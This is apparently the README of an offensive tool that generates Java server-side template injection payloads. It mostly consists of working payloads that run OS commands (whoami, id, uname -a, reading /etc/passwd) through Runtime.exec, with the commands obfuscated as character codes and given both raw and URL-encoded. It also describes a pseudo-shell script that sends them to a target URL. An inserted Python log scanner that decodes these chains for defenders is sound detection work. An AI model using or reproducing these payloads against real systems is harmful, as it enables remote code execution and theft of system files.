mez-0 / Ssti Payload

Licence: mit
SSTI Payload Generator

SSTI Payload Generator

This generator is for a specific type of Java SSTI, inspired by the following payload from PayloadsAllTheThings:

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Each character of the command string is converted to its decimal character code, and the resulting single-character strings are concatenated together. This Python script automates that process within an interactive Cmd prompt.

Example 1:

> python3 ssti-payload.py
Command ==> whoami
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105))).getInputStream())}

Command ==> id
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100))).getInputStream())}

Command ==> uname -a
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(117).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(97))).getInputStream())}

Example 2 (url encoded):

> python3 ssti-payload.py -u
Command ==> whoami
%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28119%29.concat%28T%28java.lang.Character%29.toString%28104%29%29.concat%28T%28java.lang.Character%29.toString%28111%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28105%29%29%29.getInputStream%28%29%29%7D

Command ==> id
%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28105%29.concat%28T%28java.lang.Character%29.toString%28100%29%29%29.getInputStream%28%29%29%7D

Command ==> uname -a
%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28117%29.concat%28T%28java.lang.Character%29.toString%28110%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2845%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29%29.getInputStream%28%29%29%7D
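For defenders triaging web logs, the encoding shown in the examples above can be reversed mechanically. The following is an added example, not part of this project's code: it recovers the command from a `Character.toString(N).concat(...)` chain, raw or percent-encoded. The function names and the log-line framing are constructed for illustration; the two payloads are the `id` and URL-encoded `uname -a` outputs shown above.

```python
import re
from urllib.parse import unquote

# One T(java.lang.Character).toString(<decimal>) term of the chain.
CHAR_TERM = re.compile(
    r"T\(\s*java\.lang\.Character\s*\)\.toString\(\s*(\d{1,7})\s*\)")
# Marker showing the expression reaches process execution.
EXEC_MARKER = re.compile(
    r"T\(\s*java\.lang\.Runtime\s*\)\.getRuntime\(\)\.exec\(")


def decode_char_chain(value, max_unquote_rounds=3):
    """Return the string hidden in a Character.toString(N).concat(...) chain,
    or None if the value does not contain the Runtime.exec marker."""
    # Undo (possibly repeated) percent-encoding until the text stops changing.
    for _ in range(max_unquote_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if not EXEC_MARKER.search(value):
        return None
    codes = [int(n) for n in CHAR_TERM.findall(value)]
    # Skip values outside the Unicode range instead of raising.
    return "".join(chr(c) for c in codes if c <= 0x10FFFF)


def scan_log(lines):
    """Yield (line_number, recovered_command) for each matching log line."""
    for number, line in enumerate(lines, start=1):
        command = decode_char_chain(line)
        if command is not None:
            yield number, command


# Constructed log lines: line 1 is benign, lines 2 and 3 carry payloads
# copied from the examples on this page.
SAMPLE_LOG = [
    "GET /search?q=java.lang.Character+docs HTTP/1.1",
    "GET /path?param=${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100))).getInputStream())} HTTP/1.1",
    "GET /path?param=%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28117%29.concat%28T%28java.lang.Character%29.toString%28110%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2845%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29%29.getInputStream%28%29%29%7D HTTP/1.1",
]

if __name__ == "__main__":
    for number, command in scan_log(SAMPLE_LOG):
        print(f"line {number}: recovered command {command!r}")
```

Because the character codes are plain decimals, a rule that only searches for literal command strings such as `whoami` will miss these requests; matching on the `T(java.lang.Runtime)` and `T(java.lang.Character)` structure and decoding the chain is more reliable.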

SSTI Skeleton

ssti-skel.py uses the Cmd library to create a looped command prompt. It takes input directly from the command line, encodes it appropriately, and sends it via requests to the target URL (-t).

If successful, the script acts as a pseudo-shell, allowing commands to be sent in real time. If a request fails at any time, the script quits.

This is a very specific use case. But if it works, it works.

Example command:

python3 ssti-skel.py -t 'https://example.com/path?param='

Depending on the response, the ssti=str(output).split(''')[1].rstrip() variable will probably have to be changed to suit the response. No clever logic was implemented for this :)
